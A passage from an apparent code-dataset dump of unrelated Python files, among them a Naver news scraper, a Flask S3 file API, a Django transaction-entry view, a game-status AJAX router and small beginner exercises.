vol = np.pi*r**2*h/3\n print('ra=%2.1f,rb=%2.1f,r=%2.2f,h=%2.2f,vol=%2.4f'%(circs[ia[n]],circs[ib[n]],r,h,vol))\n vols+=vol\n#plt.title('mode=%d'%(m+1))\n#plt.pause(1e-5)\n\n#mix_area = np.trapz(y=amps,x=circs)\n#print(mix_area)\n","sub_path":"build/lib/pyh2d/mix_vol.py","file_name":"mix_vol.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"495249544","text":"from dateutil.relativedelta import relativedelta\nfrom bs4 import BeautifulSoup\nfrom itertools import count\nimport urllib.request\nimport pandas as pd\nimport datetime\nimport ssl\n\n\n\nsearchname = '맥주'\nnumbers = int(1)\n\n\nresult = []\ndateformat = \"%Y.%m.%d\"\ndateformatnso = \"%Y%m%d\"\ntoday = datetime.datetime.now()\n\n## url 오류 문자 확인 구문\ncontext = ssl._create_unverified_context()\ndef get_request_url(url,enc='utf-8'):\n response = urllib.request.urlopen(url)\n request = urllib.request.Request(url, headers={'USer-Agent':'Mozilla/5.0'})\n try:\n response = urllib.request.urlopen(request)\n if response.getcode() == 200:\n print(\"[%s] Url Request Success\" % datetime.datetime.now() + tmp + searchname+ \"(\" +str(page+1)+\")\")\n return response.read().decode(enc)\n except Exception as e:\n print(e)\n print(\"[%s] Error for URL : %s\" %(datetime.datetime.now(), url))\n return None\n\n\n\n#날짜 반복 구문(월단)\nfor num in count():\n tm = today - relativedelta(months=num+1)\n tmp = tm.strftime(dateformat)\n tmpnso = tm.strftime(dateformatnso)\n beday= today - relativedelta(months=(num+2))\n bmp = beday.strftime(dateformat)\n bmpnso = beday.strftime(dateformatnso)\n \n # 입력한 월이 카운트 num를 넘으면 break\n if num > int(numbers)-int(1):\n break\n\n #url 반복문\n for page in count():\n endpoint = 'https://search.naver.com/search.naver'\n params = '?where=news&sm=tab_jum' \n params += '&query=' + urllib.parse.quote(searchname) \n params += '&sort=1' \n params += '&ds=' + tmp \n params += '&de=' + bmp \n params += '&start=' + str(page)+str(1) \n params += '&nso=so%3Add%2Cp%3Afrom' + tmpnso + 'to' + bmpnso\n url = endpoint+params\n # print(url)\n if page > 399:\n print(\"뉴스의 개수가 4000개가 넘었습니다.\")\n break\n \n #endpage '찾을수없음' 오류 해결 <4000개일 때 \n try: \n respone = get_request_url(url)\n soupData = BeautifulSoup(respone, 'html.parser')\n table = soupData.find('ul',{'class' : 'list_news'})\n uls = table.find_all('div',{'class':\"news_area\"})\n \n #자료추출 반복문\n for store in uls:\n title = store.find('a', {'class' : 'news_tit'}).text\n yyyymm = store.find('span',{'class':\"info\"}).text\n if yyyymm.endswith('P') == True:\n continue\n elif yyyymm.endswith(str('단')) == True:\n continue\n content = store.find('a',{'class':\"api_txt_lines dsc_txt_wrap\"}).text\n \n ## 서울파이낸스는 다른 태그 명을 가지고 있다\n try:\n namees = store.find('a',{'class':'info press'}).text\n except AttributeError as e:\n break\n result.append([yyyymm]+[title]+[content]+[url])\n\n except AttributeError as e:\n break\n\ndf =pd.DataFrame(result)\ndf.to_csv(\"./data/test/네이버%s뉴스test.csv\" %(searchname))\n\n\n\n\n## 2020년 1월 1일 ~ 2021년 1월 1일\n\n\n# 맥주, 소주, 와인, 전통주, 위스키, 럼, 보드카, 막걸리, 청주, 지역소주, 고량주,\n# 발효주(막걸리랑 같이 동시 필터링) 중복값 제거\n\n## ","sub_path":"Naver_News_Project/NaverNews_Data_WebCrawling.py","file_name":"NaverNews_Data_WebCrawling.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"202235429","text":"exam_hour = int(input())\r\nexam_minutes = int(input())\r\narrival_hour = int(input())\r\narrival_minutes = 
int(input())\r\n\r\nexam_time = exam_hour * 60 + exam_minutes\r\narrival_time = arrival_hour * 60 + arrival_minutes\r\ndiff = arrival_time - exam_time\r\n\r\nstate = ''\r\nif diff < -30:\r\n state = 'Early'\r\nelif diff <= 0:\r\n state = 'On time'\r\nelse:\r\n state = 'Late'\r\n\r\nresult = ''\r\nif diff != 0:\r\n hours = abs(diff) // 60\r\n minutes = abs(diff) % 60\r\n\r\n if hours > 0:\r\n if diff < 0:\r\n result = f'{hours}:{minutes:02d} hours before the start'\r\n else:\r\n result = f'{hours}:{minutes:02d} hours after the start'\r\n else:\r\n if diff < 0:\r\n result = f'{minutes} minutes before the start'\r\n else:\r\n result = f'{minutes} minutes after the start'\r\n\r\nprint(f'{state}')\r\nif diff != 0:\r\n print(f'{result}')\r\n\r\n","sub_path":"Conditional_statement_Advanced/08_on_time_for_exam.py","file_name":"08_on_time_for_exam.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"373827520","text":"from tkinter import *\r\n\r\n#1. 파티\r\nyesterday = {'홍길동', '박길동', '김길동'}\r\ntoday = {'홍길동', '정길동', '이길동'}\r\n\r\nfor y in yesterday:\r\n print(y, end=' ')\r\nprint()\r\nfor t in today:\r\n print(t, end = ' ')\r\nprint()\r\nprint(\"모두 참석한 사람: \", yesterday.intersection(today))\r\nprint(\"어제 오늘 참석한 사람: \", yesterday.union(today))\r\nprint(len(yesterday.union(today)))\r\nprint()\r\n#2. 사과\r\nsentence = input(\"문장을 입력>> \")\r\nprint('전체 글자 수: ',len(sentence),'자')\r\n\r\nword = sentence.split(' ')\r\nprint('단어 수: ',len(word),'단어')\r\nprint('전체 단어:')\r\nfor w in word:\r\n print(w+' ',len(w),'글자')\r\nprint()\r\n#3. 인기투표\r\nprint(\"인기투표 시스템\")\r\nprint(\"----------------\")\r\nprint(\"1)아이유 2)BTS 3)유재석 4)종료\")\r\nprint(\"----------------\")\r\ncount = {'아이유':0, 'BTS':0, '유재석':0}\r\nwhile True:\r\n number = int(input(\"입력>> \"))\r\n if number == 1:\r\n count['아이유'] += 1\r\n elif number == 2:\r\n count['BTS'] += 1\r\n elif number == 3:\r\n count['유재석'] += 1\r\n elif number == 4:\r\n break\r\n else:\r\n continue\r\nprint(count)\r\nfor c in count:\r\n print(c+': '+str(count[c])+'표')\r\nprint()\r\n#4. 
파일 입출력\r\nw = Tk()\r\nw.geometry('200x100')\r\nw.config()\r\nfruit = ['apple','banana','melon']\r\ndef file_write():\r\n    file1 = open('fruit.txt','w')\r\n    for f in fruit:\r\n        file1.write(f+\" \")\r\ndef file_read():\r\n    file2 = open('fruit.txt','r')\r\n    row = file2.readline().split(' ')\r\n    for r in row:\r\n        print(r)\r\nfruit_label = Label(w, text='과일: apple, banana, melon')\r\nfruit_label.pack()\r\nbutton1 = Button(w,text='파일에 저장',command=file_write)\r\nbutton1.pack()\r\nbutton2 = Button(w,text='파일 읽기',command=file_read)\r\nbutton2.pack()\r\n\r\nw.mainloop()\r\n\r\n\r\n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"180213543","text":"#WAP to create csv file and to write data\nimport csv\nf=open(\"C:/Users/amruth/Desktop/Hemraj/student.csv\",'w',newline='')\nw=csv.writer(f)\nw.writerow(['NAME','AGE','MARKS','PERCENTAGE'])\nwhile True:\n    name=input(\"Enter student name :\")\n    age=int(input(\"Enter student age :\"))\n    marks=int(input(\"Enter student marks :\"))\n    percentage=int(input(\"Enter student percentage :\"))\n    w.writerow([name,age,marks,percentage])\n    option=input(\"Let me know if you still want to continue[Yes|No]:\")\n    if option.lower()=='no':\n        break\nprint(\"Data entered successfully\")\n","sub_path":"CSV file.py","file_name":"CSV file.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"52870935","text":"import os\nimport shutil\n\nfrom flask import Blueprint, request\nfrom flask import current_app as app\nfrom flask_restful import Api, Resource\nfrom werkzeug.utils import secure_filename\nfrom flask import send_from_directory\n\nfrom app.services.aws_s3 import AWS_S3\nfrom app.config import get_etcd_config\n\nfile_blueprint = Blueprint(\"file\", __name__)\napi = Api(file_blueprint)\n\n\nclass FilesList(Resource):\n    def get(self):\n        return {\"status\": \"ok\"}, 200\n    \n    def post(self):\n        file = request.files['file']\n        filename = secure_filename(file.filename)\n        dataset_name = file.content_type\n\n        s3_file_path = f'{dataset_name}/{filename}'\n        file.save(f'./{filename}')\n\n        aws_object = AWS_S3()\n        status = aws_object.upload_file(local_file_path=f'./{filename}',\n                                        s3_file_path= s3_file_path, \n                                        bucket_name=get_etcd_config('/data-storage/bucket_name', 'BUCKET_NAME'))\n\n        try:\n            os.remove(f'./{filename}')\n        except:\n            print('Error deleting file.') # add to log\n        \n        if status == True: \n            return {'message' : 'File saved successfully to S3'}, 201\n        else:\n            return {'message' : status}, 400\n\nclass Files(Resource):\n    def get(self, dataset_name):\n        filename = request.args.get('filename')\n        save_dir = './data'\n        s3_file_path = f'{dataset_name}/{filename}'\n        local_file_path = f'{save_dir}/{filename}'\n\n        try:\n            shutil.rmtree(save_dir) \n        except:\n            print (\"Removing of the directory %s failed\" % save_dir)\n\n        try:\n            os.mkdir(save_dir)\n        except OSError:\n            print (\"Creation of the directory %s failed\" % save_dir)\n\n        aws_object = AWS_S3()\n        status = aws_object.download_file(local_file_path=local_file_path,\n                                          s3_file_path=s3_file_path, \n                                          bucket_name=get_etcd_config('/data-storage/bucket_name', 'BUCKET_NAME'))\n\n        if status == True: \n            try:\n                return send_from_directory(os.getcwd() + '/data/', filename=filename, as_attachment=True)\n            except FileNotFoundError:\n                return {'message' : 'File Not Found'}, 400\n        else:\n            return {'message' : status}, 400 \n\n    \n\n\n    def delete(self, dataset_name):\n        filename = request.args.get('filename')\n        s3_file_path = f'{dataset_name}/{filename}'\n\n        aws_object = AWS_S3()\n        status = aws_object.delete_file(s3_file_path=s3_file_path, \n                                        bucket_name=get_etcd_config('/data-storage/bucket_name', 'BUCKET_NAME'))\n\n        if status == True: \n            return {'message' : 'File deleted successfully.'}, 200\n        else:\n            return {'message' : status}, 400\n\n\n\n\napi.add_resource(FilesList, \"/v1/files\")\napi.add_resource(Files, \"/v1/files/\")","sub_path":"app/api/file/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"435325634","text":"T = int(input())\n\nfor tc in range(T):\n    N,K = map(int,input().split())\n\n    game_pan = []\n    for s in range(N):\n        li = list(map(int,input().split()))\n        game_pan.append(li)\n\n    result = 0\n    min_1 = 0\n    r_daegak = 0\n    l_daegak = 0\n\n    for x in range((N-K)+1):\n        for y in range((N - K) + 1):\n            for r in range(1,K):\n                r_daegak += game_pan[x+r][y+r]\n        for y in range((N-K)+1,N):\n            for l in range(1,K):\n                l_daegak += game_pan[x-l][y-l]\n        min_1 = r_daegak - l_daegak\n\n        if result > min_1:\n            result = min_1\n\n    print('#{} {}'.format(tc+1, result))","sub_path":"Algorithm/19.03/08/서울2반김경태_문제1.py","file_name":"서울2반김경태_문제1.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"190926586","text":"\r\nimport py_common_subseq\r\nimport hashlib\r\nimport numpy as np\r\nfrom ctypes import *\r\nimport datetime\r\nfrom difflib import SequenceMatcher\r\n\r\n\r\ndef lcs(a, b):\r\n    lengths = [[0 for j in range(len(b)+1)] for i in range(len(a)+1)]\r\n    # row 0 and column 0 are initialized to 0 already\r\n    for i, x in enumerate(a):\r\n        for j, y in enumerate(b):\r\n            if x == y:\r\n                lengths[i+1][j+1] = lengths[i][j] + 1\r\n            else:\r\n                lengths[i+1][j+1] = max(lengths[i+1][j], lengths[i][j+1])\r\n    # read the substring out from the matrix\r\n    result = \"\"\r\n    x, y = len(a), len(b)\r\n    while x != 0 and y != 0:\r\n        if lengths[x][y] == lengths[x-1][y]:\r\n            x -= 1\r\n        elif lengths[x][y] == lengths[x][y-1]:\r\n            y -= 1\r\n        else:\r\n            assert a[x-1] == b[y-1], \"ERROR\"\r\n            result = a[x-1] + result\r\n            x -= 1\r\n            y -= 1\r\n    return result\r\n\r\ndef longestSubstring(str1,str2):\r\n    # initialize SequenceMatcher object with\r\n    # input string\r\n    seqMatch = SequenceMatcher(None,str1,str2)\r\n\r\n    # find match of longest sub-string\r\n    # output will be like Match(a=0, b=0, size=5)\r\n    match = seqMatch.find_longest_match(0, len(str1), 0, len(str2))\r\n\r\n    # print longest substring\r\n    if (match.size!=0):\r\n        # print (str1[match.a: match.a + match.size])\r\n        return str1[match.a: match.a + match.size]\r\n    else:\r\n        # print ('No longest common sub-string found')\r\n        return None\r\n\r\ndef longestSubstring_length(str1,str2):\r\n    # initialize SequenceMatcher object with\r\n    # input string\r\n    seqMatch = SequenceMatcher(None,str1,str2)\r\n\r\n    # find match of longest sub-string\r\n    # output will be like Match(a=0, b=0, size=5)\r\n    match = seqMatch.find_longest_match(0, len(str1), 0, len(str2))\r\n\r\n    # print longest substring\r\n    if (match.size!=0):\r\n        # print (str1[match.a: match.a + match.size])\r\n        return len(str2[match.b: match.b + match.size])\r\n    else:\r\n        # print ('No longest common sub-string found')\r\n        return 0\r\n\r\ndef timeChecker(func, str1, str2, lang, n):\r\n    strstr1 = str1\r\n    strstr2 = str2\r\n    st1 = datetime.datetime.now()\r\n    
for i in range(n):\r\n        x = func(strstr1, strstr2)\r\n    ed1 = datetime.datetime.now()\r\n    diff1 = ed1-st1\r\n    print(\"\\n {} [sec]\".format(diff1))\r\n    print(\" Result {} : {}\".format(lang, x))\r\n    return diff1\r\n\r\ndef compare2Functions(func1, func2, str1, str2, description, n):\r\n    print(\"\\n\\n ----- {} -----\".format(description))\r\n    diff1 = timeChecker(func1, str1, str2, \"Python \", n)\r\n    diff2 = timeChecker(func2, str1, str2, \"Fortran\", n)\r\n    print(\"\\n Ratio {}\".format(diff1/diff2))\r\n","sub_path":"strdist.py","file_name":"strdist.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"22800427","text":"\"\"\" tahua.admin_interface.views.enter_transaction\n\n    This module defines the transaction-entry views for the Tahua application's\n    \"admin_interface\" package.\n\"\"\"\nimport datetime\nimport decimal\n\nimport simplejson as json\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.core.urlresolvers import reverse\n\nfrom tahua.models import User, Account, Transaction\nfrom tahua.lib import account_helper, utils\n\n#############################################################################\n\ndef enter_transaction(request):\n    \"\"\" Respond to the \"/admin/account/transaction\" URL.\n\n        We let the user enter a transaction into the system.\n    \"\"\"\n    if request.method == \"GET\":\n\n        # We're displaying the form for the first time -> set up the default\n        # values.\n\n        err_msg = None\n        type = \"P\"\n        user_id = \"\"\n        associated_user_id = \"\"\n        suffix = \"\"\n        other_user_id = \"\"\n        other_associated_user_id = \"\"\n        other_suffix = \"\"\n        amount = \"\"\n        description = \"\"\n\n    elif request.method == \"POST\":\n\n        # Respond to the user submitting our form.\n\n        if request.POST.get(\"cancel\") == \"Cancel\":\n            return HttpResponseRedirect(reverse(\"tahua.admin_interface.\" +\n                                                \"views.main.main\"))\n\n        err_msg = None # initially.\n\n        type = request.POST['type']\n        user_id = request.POST['user_id']\n        associated_user_id = request.POST['associated_user_id']\n        suffix = request.POST['suffix']\n        other_user_id = request.POST['other_user_id']\n        other_associated_user_id = request.POST['other_associated_user_id']\n        other_suffix = request.POST['other_suffix']\n        amount = request.POST['amount']\n        description = request.POST['description']\n\n        account_id = account_helper.make_account_id(user_id,\n                                                    associated_user_id,\n                                                    suffix)\n        if not account_helper.is_valid_account_id(account_id):\n            err_msg = \"You must enter a valid account identifier.\"\n\n        if user_id not in [\"\", None]:\n            try:\n                user = User.objects.get(user_id=user_id)\n            except User.DoesNotExist:\n                err_msg = \"There is no user with ID \" + user_id\n\n        if associated_user_id not in [\"\", None]:\n            try:\n                user = User.objects.get(user_id=associated_user_id)\n            except User.DoesNotExist:\n                err_msg = \"There is no user with ID \" + associated_user_id\n\n        if err_msg == None:\n            try:\n                dec_amount = decimal.Decimal(amount)\n            except decimal.InvalidOperation:\n                err_msg = \"Invalid amount.\"\n\n        if err_msg == None:\n            if type not in [Transaction.TYPE_DEPOSIT,\n                            Transaction.TYPE_WITHDRAWAL,\n                            Transaction.TYPE_PAYMENT,\n                            Transaction.TYPE_REVERSAL,\n                            Transaction.TYPE_ADJUSTMENT]:\n                err_msg = \"Please select a valid transaction type.\"\n\n        if err_msg == None:\n            if type == Transaction.TYPE_PAYMENT:\n                other_account_id = \\\n                    
account_helper.make_account_id(other_user_id,\n other_associated_user_id,\n other_suffix)\n if not account_helper.is_valid_account_id(other_account_id):\n err_msg = \"You must enter a valid other account identifier.\"\n\n # If the entered data was accepted, enter the transaction into the\n # system.\n\n if err_msg == None:\n account = account_helper.get_or_create_account(account_id)\n if type == Transaction.TYPE_PAYMENT:\n other_account = \\\n account_helper.get_or_create_account(other_account_id)\n else:\n other_account = None\n\n meta_data = {}\n if description != \"\":\n meta_data['description'] = description\n\n if type == Transaction.TYPE_PAYMENT:\n dec_amount = -dec_amount # Deduct amount from source account.\n\n transaction = Transaction()\n transaction.account = account\n transaction.other_account = other_account\n transaction.timestamp = datetime.datetime.now()\n transaction.type = type\n transaction.amount = dec_amount\n transaction.metadata = json.dumps(meta_data)\n transaction.save()\n\n # If the user is entering a payment, enter the reverse transaction\n # at the same time.\n\n if type == Transaction.TYPE_PAYMENT:\n transaction = Transaction()\n transaction.account = other_account\n transaction.other_account = account\n transaction.timestamp = datetime.datetime.now()\n transaction.type = type\n transaction.amount = -dec_amount\n transaction.metadata = json.dumps(meta_data)\n transaction.save()\n\n # Finally, tell the user about the entered transaction.\n\n if type == Transaction.TYPE_PAYMENT:\n msg = utils.formatDecimalAsMoney(-dec_amount) \\\n + \" has been transferred from \" + account.describe() \\\n + \" to \" + other_account.describe() + \".\"\n else:\n msg = 'A transaction of type \"' + transaction.type_to_string() \\\n + '\" to the value of ' \\\n + utils.formatDecimalAsMoney(dec_amount) \\\n + ' has been entered against the ' \\\n + account.describe()\n\n return render_to_response(\"admin_interface/\" +\n \"transaction_entered.html\",\n {'msg' : msg},\n context_instance=RequestContext(request))\n\n # If we get here, display the form to the user.\n\n return render_to_response(\"admin_interface/enter_transaction.html\",\n {'err_msg' : err_msg,\n 'type' : type,\n 'user_id' : user_id,\n 'associated_user_id' : associated_user_id,\n 'suffix' : suffix,\n 'other_user_id' : other_user_id,\n 'other_associated_user_id' :\n other_associated_user_id,\n 'other_suffix' : other_suffix,\n 'amount' : amount,\n 'description' : description},\n context_instance=RequestContext(request))\n\n","sub_path":"tahua/admin_interface/views/enter_transaction.py","file_name":"enter_transaction.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"244921519","text":"\nimport time\n\nprint(\"1 to view a single file\\n\"\n \"2 to create file\\n\"\n\t\"3 to copy file data'\\n'\"\n\t\"4 to view multiples files data in a single command\")\ncomm=input()\nif comm == '1':\n\tf_name=input(\"enter a file name\")\n\tf=open(f_name,'r')\n\tprint(f.read())\nelif comm =='2':\n\tf_name=input(\"enter a file name\")\n\tf=open(f_name,'w')\n\tdata=input(\"enter data without pressing enter\")\n\tf.write(data)\nelif comm=='3':\n\tf_name=input(\"enter a file name whose content to be copied\")\n\tf=open(f_name,'r')\n\tdata=f.read()\n\tf_name1=input(\"enter a file name in which data to be copied\")\n\tf=open(f_name1,'a+')\n\tprint('\\n')\n\tf.write(data)\n\tf.seek(0)\n\tprint('\\n')\n\tprint(f.read())\nelif 
comm=='4':\n\tno=int(input(\"enter no. of files you want to view data\"))\n\tli=[]\n\tfor i in range(no):\n\t\tli1=input(\"enter file name\")\n\t\tli.append(li1) #error line\n\tprint(li)\n\tfor i in li:\n\t\tf=open(i,'r')\n\t\tprint('\\n')\n\t\tprint(f.read())\n\t\ttime.sleep(1)\t\n","sub_path":"program6.py","file_name":"program6.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"35283353","text":"# API constants\n\n# API response\nJSON = 'application/json'\nTYPE_ERROR = 'Type of parameter \\'{}\\' is invalid'\n\n# HTTP Verbs\nV_POST = 'POST'\nV_GET = 'GET'\nV_PUT = 'PUT'\nV_PATCH = 'PATCH'\nV_DELETE = 'DELETE'\n\nALL = [\n V_POST, V_GET, V_PUT, V_PATCH, V_DELETE\n]\nVIEW = [\n V_GET\n]\nEDIT = [\n V_POST, V_PUT, V_PATCH\n]\nDELETE = [\n V_DELETE\n]\n\n# HTTP Status code\nOK = 200\nCREATED = 201\nNOT_FOUND = 404\nMETHOD_NOT_ALLOWED = 405\nCONFLICT = 409\nI_M_A_TEAPOT = 418\n\n","sub_path":"app/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"611779240","text":"from app import app\nfrom flask import render_template, request, session, jsonify\nfrom util.error_messages import error_enum\nfrom util.util import *\nfrom util.control import *\nimport json\n\n@app.route(\"/check_join_status\", methods=[\"GET\"])\ndef check_join_status_ajax():\n join_status = {}\n if not \"uid\" in session:\n join_status[\"success\"] = \"False\"\n return json.dumps(join_status)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n join_status[\"success\"] = \"False\"\n return json.dumps(join_status)\n count = get_player_count(access_code)\n game_setup = get_game_by_access_code(access_code)\n join_status[\"success\"] = \"True\"\n join_status[\"player_count\"] = str(count)\n join_status[\"total_player\"] = game_setup[\"total_player\"]\n join_status[\"total_killer\"] = game_setup[\"total_killer\"]\n return json.dumps(join_status)\n\n@app.route(\"/status_to_online\", methods=[\"GET\"])\ndef status_to_online_ajax():\n ret = {}\n if not \"uid\" in session:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n user_name = get_user_name_by_uid(str(session['uid']))\n status_to_online(access_code, user_name)\n ret[\"success\"] = \"True\"\n return jsonify(ret)\n\n@app.route(\"/wait_players_online\", methods=[\"GET\"])\ndef wait_players_online_ajax():\n online_status = {}\n if not \"uid\" in session:\n online_status[\"success\"] = \"False\"\n return json.dumps(online_status)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n online_status[\"success\"] = \"False\"\n return json.dumps(online_status)\n player_setup = get_player_setup(access_code)\n for ele in player_setup[\"players\"].keys():\n if player_setup[\"players\"][ele][\"status\"] == status[0]:\n online_status[\"success\"] = \"True\"\n online_status[\"ready\"] = \"False\"\n return json.dumps(online_status)\n online_status[\"success\"] = \"True\"\n online_status[\"ready\"] = \"True\"\n game_setup = get_game_by_access_code(access_code)\n if game_setup[\"stage\"] == stage[0]:\n allocate_character(access_code)\n return json.dumps(online_status)\n\n@app.route(\"/get_playing_page_info\", methods=[\"GET\"])\ndef 
get_playing_page_info_ajax():\n ret = {}\n if not \"uid\" in session:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n game_setup = get_game_by_access_code(access_code)\n player_setup = get_player_setup(access_code)\n user_name = get_user_name_by_uid(str(session['uid']))\n ret[\"start_with\"] = game_setup[\"start_with\"]\n ret[\"lead_killer\"] = player_setup[\"lead_killer\"]\n ret[\"user_name\"] = user_name\n ret[\"access_code\"] = access_code\n char_id = player_setup[\"players\"][user_name][\"character\"]\n if char_id == character[1]:\n ret[\"character\"] = \"Killer\"\n else:\n ret[\"character\"] = \"Civilian\"\n if char_id == character[1]:\n all_killers = get_all_killers(player_setup)\n ret[\"other_characters\"] = {\"All Killers in the game:\" : all_killers}\n ret[\"bunker\"] = game_setup[\"bunker\"]\n ret[\"stage\"] = game_setup[\"stage\"]\n ret[\"success\"] = \"True\"\n return json.dumps(ret)\n\n@app.route(\"/action\", methods=[\"POST\"])\ndef action_ajax():\n ret = {}\n if not \"uid\" in session:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n game_setup = get_game_by_access_code(access_code)\n user_name = get_user_name_by_uid(str(session['uid']))\n input_data = request.form.to_dict()\n stage = game_setup[\"stage\"]\n bunker = \"bunker_\" + stage\n update_data = {user_name : input_data[\"action\"]}\n update_bunker(access_code, bunker, update_data)\n bunker_data = get_bunker_by_access_code(access_code)\n if len(bunker_data[\"bunkers\"][bunker]) == int(game_setup[\"bunker\"][bunker][\"setup\"]):\n flag = False\n for key in bunker_data[\"bunkers\"][bunker]:\n if bunker_data[\"bunkers\"][bunker][key] == \"destroy\":\n flag = True\n game_stage_increase(access_code, flag)\n ret[\"success\"] = \"True\"\n return json.dumps(ret)\n","sub_path":"KBE/app/ajax_router.py","file_name":"ajax_router.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"308576230","text":"import tensorflow as tf\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', default=100, type=int, help='batch size')\nparser.add_argument('--train_steps', default=1000, type=int,\n help='number of training steps')\n\ndef main(argv):\n\tprint(\"main function\")\n\tprint(argv)\n\n\targs = parser.parse_args(argv[1:])\n\t# print(argv[1:])\n\tprint(args)\n\n\nif __name__ == '__main__':\n\ttf.app.run(main)","sub_path":"demo_basic/eg_01.py","file_name":"eg_01.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"486242054","text":"import sys\r\nimport time\r\nimport os\r\nfrom OCC.Core.BRep import BRep_Tool\r\nfrom OCC.Core.TopAbs import TopAbs_VERTEX\r\nfrom OCC.Core.TopoDS import TopoDS_Iterator, topods_Vertex\r\nfrom OCCUtils.Topology import shapeTypeString, dumpTopology\r\nfrom PyQt5.QtWidgets import QApplication, qApp\r\nfrom PyQt5.QtWidgets import QDialog, QCheckBox\r\n\r\n\r\nclass Viewer (object):\r\n\r\n def __init__(self):\r\n from OCC.Display.qtDisplay import qtViewer3d\r\n self.app = self.get_app()\r\n self.wi = self.app.topLevelWidgets()[0]\r\n self.vi = self.wi.findChild(qtViewer3d, 
\"qt_viewer_3d\")\r\n\r\n def get_app(self):\r\n app = QApplication.instance()\r\n #app = qApp\r\n # checks if QApplication already exists\r\n if not app:\r\n app = QApplication(sys.argv)\r\n return app\r\n\r\n def on_select(self):\r\n self.vi.sig_topods_selected.connect(self._on_select)\r\n\r\n def _on_select(self, shapes):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n shape : TopoDS_Shape\r\n \"\"\"\r\n for shape in shapes:\r\n self.DumpTop(shape)\r\n\r\n def DumpTop(self, shape, level=0):\r\n \"\"\"\r\n Print the details of an object from the top down\r\n \"\"\"\r\n brt = BRep_Tool()\r\n s = shape.ShapeType()\r\n if s == TopAbs_VERTEX:\r\n pnt = brt.Pnt(topods_Vertex(shape))\r\n dmp = \" \" * level\r\n dmp += \"%s - \" % shapeTypeString(shape)\r\n dmp += \"%.5e %.5e %.5e\" % (pnt.X(), pnt.Y(), pnt.Z())\r\n print(dmp)\r\n else:\r\n dmp = \" \" * level\r\n dmp += shapeTypeString(shape)\r\n print(dmp)\r\n it = TopoDS_Iterator(shape)\r\n while it.More():\r\n shp = it.Value()\r\n it.Next()\r\n self.DumpTop(shp, level + 1)\r\n","sub_path":"src/pyocc/OCCQt.py","file_name":"OCCQt.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"107885376","text":"import time\r\nfrom urllib.request import urlretrieve, urlopen\r\nfrom urllib.error import HTTPError\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import font_manager\r\nfrom matplotlib import collections as mc\r\nimport pylab as pl\r\nimport pandas\r\nimport numpy\r\nimport math\r\nfrom skyfield import almanac\r\nfrom skyfield.api import load, Topos\r\nfrom pytz import timezone, common_timezones\r\nfrom datetime import date, datetime\r\nfrom matplotlib.figure import Figure\r\nimport pathlib\r\nfrom PIL import Image\r\nimport itertools\r\n\r\n#####################################\r\n# ephem setting\r\ntz = timezone('Asia/Hong_Kong')\r\n\r\nephem = load('de421.bsp') #1900-2050 only\r\n#ephem = load('de422.bsp') #-3000-3000 only\r\n#ephem = load('de430t.bsp') #1550-2650 only\r\nearth = ephem['earth']\r\nmars = ephem['mars']\r\n#####################################\r\n\r\n#####################################\r\n# location information\r\n#HKO\r\nTrig_0 = (Topos(str(22+18/60+7.3/3600)+' N', str(114+10/60+27.6/3600)+' E'),\\\r\n 22+18/60+7.3/3600,114+10/60+27.6/3600,'22:18:07.3','N','114:10:27.6','E')\r\n\r\n#Hokoon\r\nhokoon = (Topos(str(22+23/60+1/3600)+' N', str(114+6/60+29/3600)+' E'),\\\r\n 22+23/60+1/3600,114+6/60+29/3600,'22:23:01','N','114:06:29','E')\r\n\r\nObs = hokoon #<= set your observatory\r\n\r\nts = load.timescale()\r\n##date_UTC = 